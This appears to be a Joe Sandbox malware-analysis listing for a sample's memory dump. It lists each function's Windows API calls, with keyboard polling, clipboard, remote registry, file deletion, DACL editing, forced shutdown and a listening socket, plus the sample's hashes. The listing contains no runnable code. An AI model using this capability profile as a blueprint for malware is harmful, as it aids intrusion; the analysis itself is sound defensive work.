Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID: 0D"$0E"$0F"$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG"
API String ID: 0-3311367160
Opcode ID: 8c9cba4a69a0a857da3785dd8d561086a5018022b32c45aea137a575645fb9c2
Instruction ID: 56f7e99597b56f067da1ad1574b35f0b31ff962e5b1b054462e71edd9290e662
Opcode Fuzzy Hash: 8c9cba4a69a0a857da3785dd8d561086a5018022b32c45aea137a575645fb9c2
Instruction Fuzzy Hash: 99726F75E00219EBDF18DF58D8807AEB7B5FF59310F14816AE809EB391E7749981CB90

Function 001EA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001EA20F
__swprintf.LIBCMT ref: 001EA231
CreateDirectoryW.KERNEL32(?,00000000), ref: 001EA26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 001EA293
_memset.LIBCMT ref: 001EA2B2
_wcsncpy.LIBCMT ref: 001EA2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 001EA323
CloseHandle.KERNEL32(00000000), ref: 001EA32E
RemoveDirectoryW.KERNEL32(?), ref: 001EA337
CloseHandle.KERNEL32(00000000), ref: 001EA341

Strings

\??\%s, xrefs: 001EA22B
\, xrefs: 001EA247
:, xrefs: 001EA252

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 7f822194ae58274338e7dbddc9b7a63109677437c29ebee256ea11911be7090a
Instruction ID: bbf6c20ae948d03f1993a66935dd26debc00a9ac80bd240855e9ae78a9ec3e16
Opcode Fuzzy Hash: 7f822194ae58274338e7dbddc9b7a63109677437c29ebee256ea11911be7090a
Instruction Fuzzy Hash: 4B31D4B554024AABDB20DFA1DC49FEF77BCEF89700F5040B6FA09D2161E770A6448B25

Function 001D7CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001D8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001D821E
Part of subcall function 001D8202: GetLastError.KERNEL32(?,001D7CE2,?,?,?), ref: 001D8228
Part of subcall function 001D8202: GetProcessHeap.KERNEL32(00000008,?,?,001D7CE2,?,?,?), ref: 001D8237
Part of subcall function 001D8202: HeapAlloc.KERNEL32(00000000,?,001D7CE2,?,?,?), ref: 001D823E
Part of subcall function 001D8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001D8255

Part of subcall function 001D829F: GetProcessHeap.KERNEL32(00000008,001D7CF8,00000000,00000000,?,001D7CF8,?), ref: 001D82AB
Part of subcall function 001D829F: HeapAlloc.KERNEL32(00000000,?,001D7CF8,?), ref: 001D82B2
Part of subcall function 001D829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,001D7CF8,?), ref: 001D82C3

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001D7D13
_memset.LIBCMT ref: 001D7D28
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001D7D47
GetLengthSid.ADVAPI32(?), ref: 001D7D58
GetAce.ADVAPI32(?,00000000,?), ref: 001D7D95
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001D7DB1
GetLengthSid.ADVAPI32(?), ref: 001D7DCE
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001D7DDD
HeapAlloc.KERNEL32(00000000), ref: 001D7DE4
GetLengthSid.ADVAPI32(?,00000008,?), ref: 001D7E05
CopySid.ADVAPI32(00000000), ref: 001D7E0C
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001D7E3D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001D7E63
SetUserObjectSecurity.USER32(?,00000004,?), ref: 001D7E77

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 8fa4a4a9edc812fc7f29bbfa8473e941bf9706bf016805b3ab86ea658c5cae5f
Instruction ID: 3e794fc0fbd6704cdcddca7882e5adb4de9a1cec5b06747f36e739eab971417f
Opcode Fuzzy Hash: 8fa4a4a9edc812fc7f29bbfa8473e941bf9706bf016805b3ab86ea658c5cae5f
Instruction Fuzzy Hash: 8C613E71904209AFDF10DF94DC49AEEBB7AFF44300F04816AE915A6392EB359A15CB60

Function 001E001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 001E0097
SetKeyboardState.USER32(?), ref: 001E0102
GetAsyncKeyState.USER32(000000A0), ref: 001E0122
GetKeyState.USER32(000000A0), ref: 001E0139
GetAsyncKeyState.USER32(000000A1), ref: 001E0168
GetKeyState.USER32(000000A1), ref: 001E0179
GetAsyncKeyState.USER32(00000011), ref: 001E01A5
GetKeyState.USER32(00000011), ref: 001E01B3
GetAsyncKeyState.USER32(00000012), ref: 001E01DC
GetKeyState.USER32(00000012), ref: 001E01EA
GetAsyncKeyState.USER32(0000005B), ref: 001E0213
GetKeyState.USER32(0000005B), ref: 001E0221

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 6919fc615a4c4dd575d3507144245b6f22fd9cef6ee01640ae2b2f5bbd3b86f0
Instruction ID: 2693960c86c26a3435d0af1fd05a6de80b7bc8d8c7bc050d03806ef444962504
Opcode Fuzzy Hash: 6919fc615a4c4dd575d3507144245b6f22fd9cef6ee01640ae2b2f5bbd3b86f0
Instruction Fuzzy Hash: 4751B630904BC829EB36DBA188547AEBFF49F15380F08459AD9C65A5C2DBE49BCCC761

Function 002003DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00200E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001FFDAD,?,?), ref: 00200E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002004AC

Part of subcall function 00189837: __itow.LIBCMT ref: 00189862
Part of subcall function 00189837: __swprintf.LIBCMT ref: 001898AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0020054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002005E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00200822
RegCloseKey.ADVAPI32(00000000), ref: 0020082F

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: b75145ede7a8a179a14f90fcc09d450beecd804ddd9cd065e6d47c123f423d1d
Instruction ID: ffcc1d267d428f885032e34542744c6a21f495f061da78441d8d0cac637a9b98
Opcode Fuzzy Hash: b75145ede7a8a179a14f90fcc09d450beecd804ddd9cd065e6d47c123f423d1d
Instruction Fuzzy Hash: 0DE14A31614305AFDB14DF24C895E6ABBE9FF89314F04856DF84ADB2A2DB30E911CB91

Function 001F4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 001F418B
EmptyClipboard.USER32 ref: 001F4191
GlobalAlloc.KERNEL32(00000002,?), ref: 001F41A6
CloseClipboard.USER32 ref: 001F4245

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: b804c64c5420c19cada0c08c4db3207664e61dff7af4748a120db871da46ef7a
Instruction ID: 2bf090dc829e698946de1ba0b9080549ad5bb79df4adf9526c1d253fdda3b774
Opcode Fuzzy Hash: b804c64c5420c19cada0c08c4db3207664e61dff7af4748a120db871da46ef7a
Instruction Fuzzy Hash: 6421BF352402149FDB20AF24FD0DB7E7BA8EF15310F04802AFA469B2B2DB30AD00CB84

Function 001E37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00184750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00184743,?,?,001837AE,?), ref: 00184770

Part of subcall function 001E4A31: GetFileAttributesW.KERNEL32(?,001E370B), ref: 001E4A32

FindFirstFileW.KERNEL32(?,?), ref: 001E38A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 001E394B
MoveFileW.KERNEL32(?,?), ref: 001E395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 001E397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 001E399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 001E39B9

Strings

\*.*, xrefs: 001E384E, 001E3857, 001E386C

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: dc994a4a204cf230e2839d7376d8e891fcefb675baea2b96cc7734907fe1f2e8
Instruction ID: 955115b6cb8a16187ef9899ba370ad02471d84f7de0d67ea3de6e76cbcd08ffc
Opcode Fuzzy Hash: dc994a4a204cf230e2839d7376d8e891fcefb675baea2b96cc7734907fe1f2e8
Instruction Fuzzy Hash: EB51AC3180458DAACF15FBA1DA96DEDB779AF20314F600169E812B7192EF316F09CF60

Function 001EF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00187DE1: _memmove.LIBCMT ref: 00187E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 001EF440
Sleep.KERNEL32(0000000A), ref: 001EF470
_wcscmp.LIBCMT ref: 001EF484
_wcscmp.LIBCMT ref: 001EF49F
FindNextFileW.KERNEL32(?,?), ref: 001EF53D
FindClose.KERNEL32(00000000), ref: 001EF553

Strings

*.*, xrefs: 001EF425

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: a14cbfc743d6577df60e87bdd32266d03a6e03dd5e57f73c2f9163fa549ad3de
Instruction ID: 1e7215f129b2d571a37c5144fb4ee20d0c5714afa9eef22459208ad68597a3c3
Opcode Fuzzy Hash: a14cbfc743d6577df60e87bdd32266d03a6e03dd5e57f73c2f9163fa549ad3de
Instruction Fuzzy Hash: 1141907194024AAFCF14EF65DC49AEEBBB4FF25314F10446AE815A3291EB309E45CF90

Function 00195760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 001958A5
_memmove.LIBCMT ref: 001958F5
_memmove.LIBCMT ref: 0019595B

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: cc6dc6685495d9002ef8bc45a62bb885d0da46939877415da39f4633834b7aee
Instruction ID: c42bf1a47925c64a33399d86105baee8c4b9e717e730763dcfb4ba0385f3bc9e
Opcode Fuzzy Hash: cc6dc6685495d9002ef8bc45a62bb885d0da46939877415da39f4633834b7aee
Instruction Fuzzy Hash: 18128B70A00609DFDF09DFA5D985AEEB7F6FF48304F10452AE846A7251EB36AE14CB50

Function 001E3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00184750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00184743,?,?,001837AE,?), ref: 00184770

Part of subcall function 001E4A31: GetFileAttributesW.KERNEL32(?,001E370B), ref: 001E4A32

FindFirstFileW.KERNEL32(?,?), ref: 001E3B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 001E3BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 001E3BEA
FindClose.KERNEL32(00000000), ref: 001E3C01
FindClose.KERNEL32(00000000), ref: 001E3C0A

Strings

\*.*, xrefs: 001E3B5B

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: d038e2642a8060ebb772e56b9f102150e20fe12f08a6bdcc033cd1b0060dc66d
Instruction ID: 2325104214b227dbba4a12a4615ebe325f9c917ac2034220990e8c2e97404b76
Opcode Fuzzy Hash: d038e2642a8060ebb772e56b9f102150e20fe12f08a6bdcc033cd1b0060dc66d
Instruction Fuzzy Hash: 72316D710087859BC301FB24D9958AFB7A8AFA1314F544D2DF4E593192EB21DB08CB63

Function 001E51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 001D87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001D882B
Part of subcall function 001D87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001D8858
Part of subcall function 001D87E1: GetLastError.KERNEL32 ref: 001D8865

ExitWindowsEx.USER32(?,00000000), ref: 001E51F9

Strings

@, xrefs: 001E51EC
, xrefs: 001E51E7
SeShutdownPrivilege, xrefs: 001E51C9

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 9921a39e972425de6869cba5705283119b355d1bb4e786c9774e50387cf889c8
Instruction ID: 4037e73b10a3362ed824cf6bdd6e74ba21f55fd53635d63517272501559e39e7
Opcode Fuzzy Hash: 9921a39e972425de6869cba5705283119b355d1bb4e786c9774e50387cf889c8
Instruction Fuzzy Hash: CE01F235691F53ABE72C626AAC8AFBE729AAB05788F210421FA13E21D3DB511C018590

Function 0018FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

%!, xrefs: 0018FCF3
pb$, xrefs: 001C49B9

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: BuffCharUpper
String ID: pb$$%!
API String ID: 3964851224-2770503978
Opcode ID: 29b30a8bbf4d51ca17be09eab4f89beca4f024f1a4d0e31fec804e3aa1b6775f
Instruction ID: 63c776e29f91578e181f7a0ce80e656d4b72384791c11456f8594f031d7041f8
Opcode Fuzzy Hash: 29b30a8bbf4d51ca17be09eab4f89beca4f024f1a4d0e31fec804e3aa1b6775f
Instruction Fuzzy Hash: B59289746083419FDB25DF24C490B2ABBE1BF99304F15892DF88A8B362D771ED45CB92

Function 001F6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001F62DC
WSAGetLastError.WSOCK32(00000000), ref: 001F62EB
bind.WSOCK32(00000000,?,00000010), ref: 001F6307
listen.WSOCK32(00000000,00000005), ref: 001F6316
WSAGetLastError.WSOCK32(00000000), ref: 001F6330
closesocket.WSOCK32(00000000,00000000), ref: 001F6344

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 3e968b4d8a3d8ce451c8f437988042b81c0ea442107daa701f8ea87a3b09e15d
Instruction ID: d9e6e8d2e8b11ab6a745c54fa8e4fc98145ec10e8f9e7b7528dc02321d1bf6d3
Opcode Fuzzy Hash: 3e968b4d8a3d8ce451c8f437988042b81c0ea442107daa701f8ea87a3b09e15d
Instruction Fuzzy Hash: 1921D0346002089FCB10EF64DD89B7EB7A9EF49320F148259FA1AA73A2C770AD05CB51

Function 00195520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 001A0DB6: std::exception::exception.LIBCMT ref: 001A0DEC
Part of subcall function 001A0DB6: __CxxThrowException@8.LIBCMT ref: 001A0E01

_memmove.LIBCMT ref: 001D0258
_memmove.LIBCMT ref: 001D036D
_memmove.LIBCMT ref: 001D0414

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 57e608feae5465db2a7544a5fcb85026759f076b58f48585177423a49dce423c
Instruction ID: f0cc77648e146f2b22bb36a0d3213bc13595597ecdb0b5202922527641192db7
Opcode Fuzzy Hash: 57e608feae5465db2a7544a5fcb85026759f076b58f48585177423a49dce423c
Instruction Fuzzy Hash: A002B170A00205DFCF09DF64D981AAE7BB6FF59300F55806AE80AEB355EB35DA50CB91

Function 00181287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623

DefDlgProcW.USER32(?,?,?,?,?), ref: 001819FA
GetSysColor.USER32(0000000F), ref: 00181A4E
SetBkColor.GDI32(?,00000000), ref: 00181A61

Part of subcall function 00181290: DefDlgProcW.USER32(?,00000020,?), ref: 001812D8

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: ab0cf8a88d127259ec8a688384e03c4795cd43942b871316b0f68c08de3e6fed
Instruction ID: 242c1dfc408286a1f6e98ab614b6b9502d35279925907e60f20a02385f04e1f0
Opcode Fuzzy Hash: ab0cf8a88d127259ec8a688384e03c4795cd43942b871316b0f68c08de3e6fed
Instruction Fuzzy Hash: 9FA147B2116694FAE72CBB28DC88DBB355CDB42345B25021AF502D75D2CB648F029FB1

Function 001EBCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 001EBCE6
_wcscmp.LIBCMT ref: 001EBD16
_wcscmp.LIBCMT ref: 001EBD2B
FindNextFileW.KERNEL32(00000000,?), ref: 001EBD3C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 001EBD6C

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: f12a4e2eecb1e1a232b35d57b43ca2771095c4416a97a426c2468d06862f2a4d
